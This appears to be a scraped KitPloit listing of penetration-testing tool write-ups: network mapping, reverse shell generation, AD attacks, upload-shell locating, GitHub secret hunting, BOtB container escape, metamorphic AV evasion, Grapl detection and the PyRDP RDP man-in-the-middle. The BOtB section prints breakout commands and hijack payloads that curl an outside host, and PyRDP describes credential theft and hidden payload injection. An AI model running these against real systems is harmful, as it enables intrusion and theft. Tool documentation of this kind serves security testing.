Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

LetsMapYourNetwork - Tool To Visualise Your Physical Network In Form Of Graph With Zero Manual Error

$
0
0

It is utmost important for any security engineer to understand their network first before securing it and it becomes a daunting task to have a ‘true’ understanding of a widespread network. In a mid to large level organisation’s network having a network architecture diagram doesn’t provide the complete understanding and manual verification is a nightmare. Hence in order to secure entire network it is important to have a complete picture of all the systems which are connected to your network, irrespective of their type, function, techology etc.

BOTTOM LINE - YOU CAN'T SECURE WHAT YOU ARE NOT AWARE OF.
Let’s Map Your Network (LMYN) aims to provide an easy to use interface to security engineer and network administrator to have their network in graphical form with zero manual error, where a node represents a system and relationship between nodes represent the connection.
LMYN does it in two phases:
  1. Learning: In this phase LMYN 'learns' the network by performing the network commands and quering the APIs and then builds graph database leveraging the responses. User can perform any of the learning activities at any point of time and LMYN will incorporate the results in existing database.
  2. Monitoring: This is a continuos process, where LMYN monitors the 'in-scope' network for any changes, compare it with existing information and update the graph database accordingly.
Below technologies have been used in the tool:
  1. Django Python
  2. Neo4j DB
  3. Sigma JS
  4. Celery and RabbitMQ

WHY IT IS
  • Visualizing infrastructure network in form of graph makes it more ‘visible’ and it becomes significantly easy to perform the analysis and identify the key areas of concern for a security engineer and network administrator
  • Also, Let’s Map Your Network formulates the graph entirely based-on either network actions performed from ‘seed’ system which will be part of the actual network or quering the APIs. Hence there is no chance of manual-error in the mapping of network

WHERE TO USE IT
  1. Network Architecture 'Validation'
  2. Troubleshooting for network administrator
  3. Internal Network vulnerability assessment and penetration testing

Presentations

Contributer
Jyoti Raval: (Brutal!) QA

LMYN In Action

Local subnet network


Network with traceroute to mulitple destinations


CMDB Upload


Cloud network


Contact Information



Revshellgen - Reverse Shell Generator Written In Python.

$
0
0

Standalone python script for generating reverse shells easily and automating the boring stuff like URL encoding the command and setting up a listener.

Download
git clone https://github.com/t0thkr1s/revshellgen

Install
The script has 2 dependencies:
You can install these by typing:
python3 setup.py install

Disclaimer
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.


ActiveReign - A Network Enumeration And Attack Toolset

$
0
0

Background
A while back I was challenged to write a discovery tool with Python3 that could automate the process of finding sensitive information on network file shares. After writing the entire tool with pysmb, and adding features such as the ability to open and scan docx an xlsx files, I slowly started adding functionality from the awesome Impacket library; just simple features I wanted to see in an internal penetration testing tool. The more I added, the more it looked like a Python3 rewrite of CrackMapExec created from scratch.
If you are doing a direct comparison, CME is an amazing tool that has way more features than currently implement here. However, I added a few modifications that may come in handy during an assessment.

For more documentation checkout the project wiki

Operational Modes
  • db - Query or insert values in to the ActiveReign database
  • enum - System enumeration& module execution
  • shell - Spawn an emulated shell on a target system
  • spray - Domain password spraying and brute force
  • query - Perform LDAP queries on the domain

Key Features
  • Automatically extract domain information via LDAP and incorporate into network enumeration.
  • Perform Domain password spraying using LDAP to remove users close to lockout thresholds.
  • Local and remote command execution, for use on multiple starting points throughout the network.
  • Emulated interactive shell on target system
  • Data discovery capable of scanning xlsx and docx files.
  • Various modules to add and extend capabilities.

Acknowledgments
There were many intended and unintended contributors that made this project possible. If I am missing any, I apologize, it was in no way intentional. Feel free to contact me and we can make sure they get the credit they deserve ASAP!

Final Thoughts
Writing this tool and testing on a variety of networks/systems has taught me that execution method matters, and depends on the configuration of the system. If a specific module or feature does not work, determine if it is actually the program, target system, configuration, or even network placement before creating an issue.
To help this investigation process, I have created a test_execution module to run against a system with known admin privileges. This will cycle through all all execution methods and provide a status report to determine the best method to use:
$ activereign enum -u administrator -p password --local-auth -M test_execution 192.168.3.20
[*] Lockout Tracker Using default lockout threshold: 3
[*] Enum Authentication \administrator (Password: p****) (Hash: False)
[+] WIN-T460 192.168.3.20 ENUM Windows 7 Ultimate 7601 Service Pack 1 (Domain: ) (Signing: False) (SMBv1: True) (Adm!n)
[*] WIN-T460 192.168.3.20 TEST_EXECUTION Execution Method: WMIEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] WIN-T460 192.168.3.20 TEST_EXECUTION Execution Method: SMBEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS


fileGPS - A Tool That Help You To Guess How Your Shell Was Renamed After The Server-Side Script Of The File Uploader Saved It

$
0
0

Introduction
When you upload a shell on a web-server using a file upload functionality, usually the file get renamed in various ways in order to prevent direct access to the file, RCE and file overwrite.
fileGPS is a tool that uses various techniques to find the new filename, after the server-side script renamed and saved it.
Some of the techniques used by fileGPS are:
  • Various hash of the filename
  • Various timestamps tricks
  • Filename + PHP time() up to 5 minutes before the start of the script
  • So many more



Features
  • Easy to use
  • Multithreaded
  • HTTP(s) Proxy support
  • User agent randomization
  • Over 100.000 filenames combinations

Installation
On BlackArch Linux:
pacman -S filegps
On other distros:
git clone https://github.com/0blio/filegps

How to write a module
Writing a module is fairly simple and allows you to implement your custom ways of generating filename combinations.
Below is a template for your modules:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Module name: test
Coded by: Your name / nickname
Version: X.X

Description:
This module destroy the world.
"""
output = []

# Do some computations here

output = ["filename1.php", "filename2.asp", "filename3.jar"]
The variables url and filename are automatically imported from the core script, so you can call them in your module.
Once you finished to write your module, you have to save it in Modules/, and it will be automatically imported once the main script is started.
You can use the module shame as a template for your modules.

Contribute to the project
Do you want to help? Here's some ways you can do it:
  • Suggest a feature
  • Write a module
  • Report a bug

Contacts
Email: michele.cisternino@protonmail.com

Special thanks
Special thanks to Panfilo Salutari for sharing with me ideas about the project.
Thanks to Claudio Sala for the logo.


gitGraber - Tool To Monitor GitHub To Search And Find Sensitive Data For Different Online Services Such As: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...

$
0
0

gitGraber is a tool developed in Python3 to monitor GitHub to search and find sensitive data for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...


How it work ?
It's important to understand that gitGraber is not designed to check history of repositories, many tools can already doing this great. gitGraber was originally developed to monitor and to parse last indexed files on GitHub. If gitGraber find something interesting, you will receive a notification on your Slack channel. You can also use it to have results directly on the command line.
In our experience, we are convinced that leaks do not come only from the organizations themselves, but also from service providers and employees, who do not necessarily have a "profile" indicating that they work for a particular organization. .
Regex are supposed to be the more precise than possible. Sometimes, maybe you will have false-positive, feel free to contribute to improve recon and add new regex for pattern detection.
We prefer to reduce false positive instead to send notification for every "standard" API key which could found by gitGraber but irrelevant for hunter.

How to use gitGraber ?
usage: gitGraber.py [-h] [-k KEYWORDSFILE] [-q QUERY] [-s] [-w WORDLIST]

optional arguments:
-h, --help show this help message and exit
-k KEYWORDSFILE, --keyword KEYWORDSFILE
Specify a keywords file (-k keywordsfile.txt)
-q QUERY, --query QUERY
Specify your query (-q "apikey")
-s, --slack Enable slack notifications
-w WORDLIST, --wordlist WORDLIST
Create a wordlist that fills dynamically with
discovered filenames on GitHub

Dependencies
gitGraber needs some dependencies, to install them on your environment:
pip3 install -r requirements.txt

Configuration
Before to start gitGraber you need to modify the configuration file config.py :
  • Add your own Github tokens : GITHUB_TOKENS = ['yourToken1Here','yourToken2Here']
  • Add your own Slack Webhook : SLACK_WEBHOOKURL = 'https://hooks.slack.com/services/TXXXX/BXXXX/XXXXXXX'
How to create Slack Webhook URL
To start and use gitGraber : python3 gitGraber.py -k wordlists/keywords.txt -q "uber" -s
We recommend creating a cron that will execute the script regulary:
*/10 * * * * cd /BugBounty/gitGraber/ && /usr/bin/python3 gitGraber.py -k wordlists/keywords.txt -q "uber" -s >/dev/null 2>&1

Wordlists & Resources
Some wordlists have been created by us and some others are inspired from other repo/researcher

TODO
  • Add more regex & patterns
  • Add a "combo check" module (for services like Twilio that require two tokens)
  • Add multi threads
  • Add bearer token detections
  • Change token cleaning output
  • Add user and org names display in notifications

Authors

Disclaimer
This project is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this tool.


Botb - A Container Analysis And Exploitation Tool For Pentesters And Engineers

$
0
0

BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.

What does it do?
BOtB is a CLI tool which allows you to:
  • Exploit common container vulnerabilities
  • Perform common container post exploitation actions
  • Provide capability when certain tools or binaries are not available in the Container
  • Use BOtB's capabilities with CI/CD technologies to test container deployments
  • Perform the above in either a manual or automated approach

Current Capabilities
  • Find and Identify UNIX Domain Sockets
  • Identify UNIX domain sockets which support HTTP
  • Find and identify the Docker Daemon on UNIX domain sockets or on an interface
  • Analyze and identify sensitive strings in ENV and process in the ProcFS i.e /Proc/{pid}/Environ
  • Identify metadata services endpoints i.e http://169.254.169.254
  • Perform a container breakout via exposed Docker daemons
  • Perform a container breakout via CVE-2019-5736
  • Hijack host binaries with a custom payload
  • Perform actions in CI/CD mode and only return exit codes > 0
  • Scrape metadata info from GCP metadata endpoints
  • Push data to an S3 bucket
  • Break out of Privileged Containers
  • Force BOtB to always return a Exit Code of 0 (useful for non-blocking CI/CD)

Getting BOtB
BOtB is available as a binary in the Releases Section.

Building BOtB
BOtB is written in GO and can be built using the standard GO tools. The following can be done to get you started:
Getting the Code:
go get github.com/brompwnie/botb
or
git clone git@github.com:brompwnie/botb.git
Building the Code:
govendor init
govendor add github.com/tv42/httpunix
govendor add github.com/kr/pty
go build -o botbsBinary

Usage
BOtB can be compiled into a binary for the targeted platform and supports the following usage
Usage of ./botb:
-aggr string
Attempt to exploit RuncPWN (default "nil")
-always-succeed
Attempt to scrape the GCP metadata service
-autopwn
Attempt to autopwn exposed sockets
-cicd
Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0
-endpointlist string
Provide a wordlist (default "nil")
-find-docker
Attempt to find Dockerd
-find-http
Hunt for Available UNIX Domain Sockets with HTTP
-hijack string
Attempt to hijack binaries on host (default "nil")
-interfaces
Display available network interfaces
-metadata
Attempt to find metadata services
-path string
Path to Start Scanning for UNIX Domain Sockets (default "/")
-pwn-privileged string
Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil")
-recon
Perform Recon of the C ontainer ENV
-region string
Provide a AWS Region e.g eu-west-2 (default "nil")
-s3bucket string
Provide a bucket name for S3 Push (default "nil")
-s3push string
Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
-scrape-gcp
Attempt to scrape the GCP metadata service
-socket
Hunt for Available UNIX Domain Sockets
-verbose
Verbose output
-wordlist string
Provide a wordlist (default "nil")
The following usage examples will return a Exit Code > 0 by default when an anomaly is detected, this is depicted by "echo $?" which shows the exit code of the last executed command.

Find UNIX Domain Sockets
#./bob_linux_amd64 -socket=true
[+] Break Out The Box
[+] Hunting Down UNIX Domain Sockets from: /
[!] Valid Socket: /var/meh
[+] Finished

#echo $?
1

Find a Docker Daemon
#./bob_linux_amd64 -find-docker=true
[+] Break Out The Box
[+] Looking for Dockerd
[!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375
[+] Hunting Docker Socks
[!] Valid Docker Socket: /var/meh
[+] Finished

#echo $?
1

Break out from Container via Exposed Docker Daemon
This approach will breakout into an interactive TTY on the host.
#./bob_linux_amd64 -autopwn=true    
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ #

Break out of a Container but in a CI/CD Friendly way
This approach does not escape into a TTY on the host but instead returns an Exit Code > 0 to indicate a successful container breakout.
#./bob_linux_amd64 -autopwn=true -cicd=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[!] Successfully escaped container
[+] Finished

#echo $?
1

Exploit CVE-2019-5736 with a Custom Payload
Please note that for this exploit to work, a process has to be executed in the target container in this scenario.
#./bob_linux_amd64 -aggr='curl "https://some.endpoint.com?command=$0&param1=$1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIME BUT YOU MIGHT GET SHELLZ...
[+] Attempting to exploit CVE-2019-5736 with command: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1
[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped
[+] Finished

Hijack Commands/Binaries on a Host with a Custom Payload
Please note that this can be used to test if external entities are executing commands within the container. Examples are Docker Exec and Kubetcl CP.
#./bob_linux_amd64 -hijack='curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$
1&param2=$2">/dev/null 2>&1'
[+] Break Out The Box
[!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...
[+] Attempting to hijack binaries
[*] Command to be used: curl "https://bobendpoint.herokuapp.com/canary/bobby?command=$0&param1=$1&param2=$2">/dev/null 2>&1
[+] Currently hijacking: /bin
[+] Currently hijacking: /sbin
[+] Currently hijacking: /usr/bin
[+] Finished

Analyze ENV and ProcFS Environ for Sensitive Strings
By default BOtB will search for the two terms "secret" and "password".
 ./bob_linux_amd64 -recon=true
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[!] Sensitive keyword found in: /proc/1/environ -> 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=0e51200113eaTERM=xtermGOLANG_VERSION=1.12.4GOPATH=/gofoo=secretpasswordHOME=/root'
[!] Sensitive keyword found in: /proc/12/environ -> 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/app/binHOME=/rootfoo=secretpasswordTERM=xtermSHLVL=1PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin_=./bob_linux_amd64OLDPWD=/bin'
[!] Sensitive keyword found in: /proc/self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[!] Sensitive keyword found in: /proc/thread-self/environ -> 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordOLDPWD=/bin_=./bob_linux_amd64TERM=xtermPATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binGOPATH=/goPWD=/app/binGOLANG_VERSION=1.12.4'
[+] Checking ENV Variables for secrets
[!] Sensitive Keyword found in ENV: foo=secretpassword
[+] Finished

#echo $?
1
A wordlist can be supplied to BOtB to scan for particular keywords.
#cat wordlist.txt 
moo

# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt
[+] Break Out The Box
[+] Performing Container Recon
[+] Searching /proc/* for data
[*] Loading entries from: wordlist.txt
[+] Checking ENV Variables for secrets
[*] Loading entries from: wordlist.txt
[+] Finished

# echo $?
0

Scan for Metadata Endpoints
BOtB by default scans for two Metadata endpoints.
#  ./bob_linux_amd64 -metadata=true                    
[+] Break Out The Box
[*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'
[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'
[+] Finished

# echo $?
0
BOtB can also be supplied with a list of endpoints to scan for.
#  cat endpoints.txt 
https://heroku.com

# ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt
[+] Break Out The Box
[*] Loading entries from: endpoints.txt
[*] Attempting to query metadata endpoint: 'https://heroku.com'
[!] Reponse from 'https://heroku.com' -> 200
[+] Finished

# echo $?
1

Get Interfaces and IP's
#  ./bob_linux_amd64 -interfaces=true
[+] Break Out The Box
[+] Attempting to get local network interfaces
[*] Got Interface: lo
[*] Got address: 127.0.0.1/8
[*] Got Interface: tunl0
[*] Got Interface: ip6tnl0
[*] Got Interface: eth0
[*] Got address: 172.17.0.3/16
[+] Finished

Scan for UNIX Domain Sockets that respond to HTTP
#  ./bob_linux_amd64 -find-http=true
[+] Break Out The Box
[+] Looking for HTTP enabled Sockets
[!] Valid HTTP Socket: /var/run/docker.sock
[+] Finished

Scrape data from GCP metadata instance
#  ./botb_linux_amd64 -scrape-gcp=true
[+] Break Out The Box
[+] Attempting to connect to: 169.254.169.254:80

[*] Output->
HTTP/1.0 200 OK
Metadata-Flavor: Google
Content-Type: application/text
Date: Sun, 30 Jun 2019 21:53:41 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 21013
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0
0.1/meta-data/attached-disks/disks/0/index 0
0.1/meta-data/attached-disks/disks/0/mode READ_WRITE
.....

Push data to an AWS S3 Bucket
#  ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2
[+] Break Out The Box
[+] Pushing fileToPush.tar.gz -> nameOfS3Bucket
[*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz
[+] Finished

Break out of a Privileged Container
#  ./bob_linux_amd64 -pwn-privileged=hostname
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
root@418fa238e34d:/app# cat /output
docker-desktop

Force BOtB to always succeed with a Exit Code of 0
This is useful for non-blocking CI/CD tests
#  ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed-true
[+] Break Out The Box
[+] Attempting to exploit CGROUP Privileges
[*] The result of your command can be found in /output
[+] Finished
# echo $?
0

Using BOtB with CI\CD
BOtB can be used with CI\CD technologies that make use of exit codes to determine if tests have passed or failed. Below is a Shell script that executes two BOtB tests and the exit codes of the two tests are used to set the exit of the Shell script. If any of the two tests return an Exit Code >0, the test executing the shell script will fail.
#!/bin/sh 

exitCode=0

echo "[+] Testing UNIX Sockets"
./bob_linux_amd64 -autopwn -cicd=true
exitCode=$?

echo "[+] Testing Env"
./bob_linux_amd64 -recon=true
exitCode=$?

(exit $exitCode)
The above script is not the only way to use BOtB with CI\CD technologies but could also be used by itself and not wrapped in a shell script. An example YML config would be:
version: 2
cicd:
runATest: ./bob_linux_amd64 -autopwn -cicd=true
Below is an example config that can be used with Heroku CI:
{
"environments": {
"test": {
"scripts": {
"test": "./bob_linux_amd64 -autopwn -cicd=true"
}
}
}
}
Below is an example config with Heroku CI but using a wrapper shell script:
{
"environments": {
"test": {
"scripts": {
"test": "./bin/testSocksAndEnv.sh"
}
}
}
}


Issues, Bugs and Improvements
For any bugs, please submit an issue. There is a long list of improvements but please submit an Issue if there is something you want to see added to BOtB.

References and Resources
This tool would not be possible without the contribution of others in the community, below is a list of resources that have helped me.

Talks and Events
BOtB is scheduled to be presented at the following:


Metame - Metame Is A Metamorphic Code Engine For Arbitrary Executables

$
0
0
metame is a simple metamorphic code engine for arbitrary executables.
From Wikipedia:
Metamorphic code is code that when run outputs a logically equivalent version of its own code under some interpretation. This is used by computer viruses to avoid the pattern recognition of anti-virus software.
metame implementation works this way:
  1. Open a given binary and analyze the code
  2. Randomly replace instructions with equivalences in logic and size
  3. Copy and patch the original binary to generate a mutated variant

It currently supports the following architectures:
  • x86 32 bits
  • x86 64 bits
Also, it supports a variety of file formats, as radare2 is used for file parsing and code analysis.
Example of code before and after mutation:


Hint: Two instructions have been replaced in this snippet.
Here another example on how it can mutate a NOP sled into equivalent code:


Installation
pip install metame
This should also install the requirements.
You will also need radare2. Refer to the official website for installation instructions.
simplejson is also a "nice to have" for a small performance boost:
pip install simplejson

Usage
metame -i original.exe -o mutation.exe -d
Use metame -h for help.


Grapl - Graph Platform For Detection And Response

$
0
0
Grapl is a Graph Platform for Detection and Response.
For a more in depth overview of Grapl, read this.
In short, Grapl will take raw logs, convert them into graphs, and merge those graphs into a Master Graph. It will then orchestrate the execution of your attack signatures and provide tools for performing your investigations.
Grapl supports nodes for:
  • Processes (Beta)
  • Files (Beta)
  • Networking (Alpha)
and currently parses Sysmon logs or a generic JSON log format to generate these graphs.
Key Features
Setup

Key Features
Identity
If you’re familiar with log sources like Sysmon, one of the best features is that processes are given identities. Grapl applies the same concept but for any supported log type, taking psuedo identifiers such as process ids and discerning canonical identities.
This cuts down on storage costs and gives you central locations to view your data, as opposed to having it spread across thousands of logs. As an example, given a process’s canonical identifier you can view all of the information for it by selecting the node.


Analyzers (Beta)
Analyzers are your attacker signatures. They’re Python modules, deployed to Grapl’s S3 bucket, that are orchestrated to execute upon changes to grapl’s Master Graph.
Analyzers execute in realtime as the master graph is updated.
Grapl provides an analyzer library (alpha) so that you can write attacker signatures using pure Python. See this repo for examples.
Here is a brief example of how to detect a suspicious execution of svchost.exe,
    valid_parents = get_svchost_valid_parents()
p = (
ProcessQuery()
.with_process_name(eq=valid_parents)
.with_children(
ProcessQuery().with_process_name(eq="svchost.exe")
)
.query_first(client, contains_node_key=process.node_key)
)
Keeping your analyzers in code means you can:
  • Code review your alerts
  • Write tests, integrate into CI
  • Build abstractions, reuse logic, and generally follow best practices for maintaining software
Engagements (alpha)
Grapl provides a tool for investigations called an Engagement. Engagements are an isolated graph representing a subgraph that your analyzers have deemed suspicious.
Using AWS Sagemaker hosted Jupyter Notebooks, Grapl will (soon) provide a Python library for interacting with the Engagement Graph, allowing you to pivot quickly and maintain a record of your investigation in code.


Grapl provides a live updating view of the engagement graph as you interact with it in the notebook, currently in alpha.


Event Driven and Extendable
Grapl was built to be extended - no service can satisfy every organization’s needs. Every native Grapl service works by sending and receiving events, which means that in order to extend Grapl you only need to start subscribing to messages.
This makes Grapl trivial to extend or integrate into your existing services.



Setup
Setting up a basic playground version of Grapl is pretty simple.
To get started you'll need to install npm, typescript, and the aws-cdk.
Your aws-cdk version should match the version in Grapl's package.json file.
Clone the repo:
git clone https://github.com/insanitybit/grapl.git
Change directories to the grapl/grapl-cdk/ folder. There should already be build binaries.
Execute npm i to install the aws-cdk dependencies.
Add a .env file, and fill it in:
BUCKET_PREFIX="<unique prefix to differentiate your buckets>"
Run the deploy script ./deploy_all.sh
It will require confirming some changes to security groups, and will take a few minutes to complete.
This will give you a Grapl setup that’s adequate for testing out the service.
You can send some test data up to the service by going to the root of the grapl repo and calling: python ./gen-raw-logs.py <your bucket prefix>.
This requires the boto3 and zstd Python modules.
Note that this may impose charges to your AWS account.



Pyrdp - RDP Man-In-The-Middle And Library For Python3 With The Ability To Watch Connections Live Or After The Fact

$
0
0

PyRDP is a Python 3 Remote Desktop Protocol (RDP) Man-in-the-Middle (MITM) and library.
It features a few tools:
  • RDP Man-in-the-Middle
    • Logs credentials used when connecting
    • Steals data copied to the clipboard
    • Saves a copy of the files transferred over the network
    • Saves replays of connections so you can look at them later
    • Run console commands or PowerShell payloads automatically on new connections
  • RDP Player:
    • See live RDP connections coming from the MITM
    • View replays of RDP connections
    • Take control of active RDP sessions while hiding your actions
    • List the client's mapped drives and download files from them during active sessions
  • RDP Certificate Cloner:
    • Create a self-signed X509 certificate with the same fields as an RDP server's certificate
We have used this tool as part of an RDP honeypot which records sessions and saves a copy of the malware dropped on our target machine.
PyRDP was first introduced in a blogpost in which we demonstrated that we can catch a real threat actor in action. In May 2019 a presentation by its authors was given at NorthSec and two demos were performed. The first one covered credential logging, clipboard stealing, client-side file browsing and a session take-over. The second one covered the execution of cmd or powershell payloads when a client successfully authenticates. In August 2019, PyRDP was demo'ed at BlackHat Arsenal (slides).

Supported Systems
PyRDP should work on Python 3.6 and up.
This tool has been tested to work on Python 3.6 on Linux (Ubuntu 18.04) and Windows (See section Installing on Windows). It has not been tested on OSX.

Installing
We recommend installing PyRDP in a virtual environment to avoid dependency issues.
First, make sure to install the prerequisite packages (on Ubuntu):
sudo apt install libdbus-1-dev libdbus-glib-1-dev
On some systems, you may need to install the python3-venv package:
sudo apt install python3-venv
Then, create your virtual environment in PyRDP's directory:
cd pyrdp 
python3 -m venv venv
DO NOT use the root PyRDP directory for the virtual environment folder (python3 -m venv .). You will make a mess, and using a directory name like venv is more standard anyway.
Before installing the dependencies, you need to activate your virtual environment:
source venv/bin/activate
Finally, you can install the project with Pip:
pip3 install -U pip setuptools wheel
pip3 install -U -e .
This should install all the dependencies required to run PyRDP.
If you ever want to leave your virtual environment, you can simply deactivate it:
deactivate
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

Installing on Windows
The steps are almost the same. There are two additional prerequisites.
  1. Any C compiler
  2. OpenSSL. Make sure it is reachable from your $PATH.
Then, create your virtual environment in PyRDP's directory:
cd pyrdp
python3 -m venv venv
DO NOT use the root PyRDP directory for the virtual environment folder (python3 -m venv .). You will make a mess, and using a directory name like venv is more standard anyway.
Before installing the dependencies, you need to activate your virtual environment:
venv\Scripts\activate
Finally, you can install the project with Pip:
pip3 install -U pip setuptools wheel
pip3 install -U -e .
This should install all the dependencies required to run PyRDP.
If you ever want to leave your virtual environment, you can simply deactivate it:
deactivate
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

Installing with Docker
First of all, build the image by executing this command at the root of PyRDP (where Dockerfile is located):
docker build -t pyrdp .
Afterwards, you can execute the following command to run the container:
docker run -it pyrdp pyrdp-mitm.py 192.168.1.10
For more information about the various commands and arguments, please refer to these sections:
To store the PyRDP output permanently (logs, files, etc.), add the -v option to the previous command. For example:
docker run -v /home/myname/pyrdp_output:/home/pyrdp/pyrdp_output pyrdp pyrdp-mitm.py 192.168.1.10
Make sure that your destination directory is owned by a user with a UID of 1000, otherwise you will get a permission denied error. If you're the only user on the system, you should not need to worry about this.

Using the player in Docker
Using the player will require you to export the DISPLAY environment variable from the host to the docker. This redirects the GUI of the player to the host screen. You also need to expose the host's network and stop Qt from using the MIT-SHM X11 Shared Memory Extension. To do so, add the -e and --net options to the run command:
docker run -e DISPLAY=$DISPLAY -e QT_X11_NO_MITSHM=1 --net=host pyrdp pyrdp-player.py
Keep in mind that exposing the host's network to the docker can compromise the isolation between your container and the host. If you plan on using the player, X11 forwarding using an SSH connection would be a more secure way.

Migrating away from pycrypto
Since pycrypto isn't maintained anymore, we chose to migrate to pycryptodome. If you get this error, it means that you are using the module pycrypto instead of pycryptodome.
[...]
File "[...]/pyrdp/pyrdp/pdu/rdp/connection.py", line 10, in <module>
from Crypto.PublicKey.RSA import RsaKey
ImportError: cannot import name 'RsaKey'
You will need to remove the module pycrypto and reinstall PyRDP.
pip3 uninstall pycrypto
pip3 install -U -e .

Using the PyRDP Man-in-the-Middle
Use pyrdp-mitm.py <ServerIP> or pyrdp-mitm.py <ServerIP>:<ServerPort> to run the MITM.
Assuming you have an RDP server running on 192.168.1.10 and listening on port 3389, you would run:
pyrdp-mitm.py 192.168.1.10
When running the MITM for the first time on Linux, a private key and certificate should be generated for you in ~/.config/pyrdp. These are used when TLS security is used on a connection. You can use them to decrypt PyRDP traffic in Wireshark, for example.

Specifying the private key and certificate
If key generation didn't work or you want to use a custom key and certificate, you can specify them using the -c and -k arguments:
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem

Connecting to the PyRDP player
If you want to see live RDP connections through the PyRDP player, you will need to specify the ip and port on which the player is listening using the -i and -d arguments. Note: the port argument is optional, the default port is 3000.
pyrdp-mitm.py 192.168.1.10 -i 127.0.0.1 -d 3000

Connecting to a PyRDP player when the MITM is running on a server
If you are running the MITM on a server and still want to see live RDP connections, you should use SSH remote port forwarding to forward a port on your server to the player's port on your machine. Once this is done, you pass 127.0.0.1 and the forwarded port as arguments to the MITM. For example, if port 4000 on the server is forwarded to the player's port on your machine, this would be the command to use:
pyrdp-mitm.py 192.168.1.10 -i 127.0.0.1 -d 4000

Running payloads on new connections
PyRDP has support for running console commands or PowerShell payloads automatically when new connections are made. Due to the nature of RDP, the process is a bit hackish and is not always 100% reliable. Here is how it works:
  1. Wait for the user to be authenticated.
  2. Block the client's input / output to hide the payload and prevent interference.
  3. Send a fake Windows+R sequence and run cmd.exe.
  4. Run the payload as a console command and exit the console. If a PowerShell payload is configured, it is run with powershell -enc <PAYLOAD>.
  5. Wait a bit to allow the payload to complete.
  6. Restore the client's input / output.
For this to work, you need to set 3 arguments:
  • the payload
  • the delay before the payload starts
  • the payload's duration

Setting the payload
You can use one of the following arguments to set the payload to run:
  • --payload, a string containing console commands
  • --payload-powershell, a string containing PowerShell commands
  • --payload-powershell-file, a path to a PowerShell script

Choosing when to start the payload
For the moment, PyRDP does not detect when the user is logged on. You must give it an amount of time to wait for before running the payload. After this amount of time has passed, it will send the fake key sequences and expect the payload to run properly. To do this, you use the --payload-delay argument. The delay is in milliseconds. For example, if you expect the user to be logged in within the first 5 seconds, you would use the following arguments:
--payload-delay 5000
This could be made more accurate by leveraging some messages exchanged during RDPDR initialization. See this issue if you're interested in making this work better.

Choosing when to resume normal activity
Because there is no direct way to know when the console has stopped running, you must tell PyRDP how long you want the client's input / output to be blocked. We recommend you set this to the maximum amount of time you would expect the console that is running your payload to be visible. In other words, the amount of time you would expect your payload to complete. To set the payload duration, you use the --payload-duration argument with an amount of time in milliseconds. For example, if you expect your payload to take up to 5 seconds to complete, you would use the following argument:
--payload-duration 5000
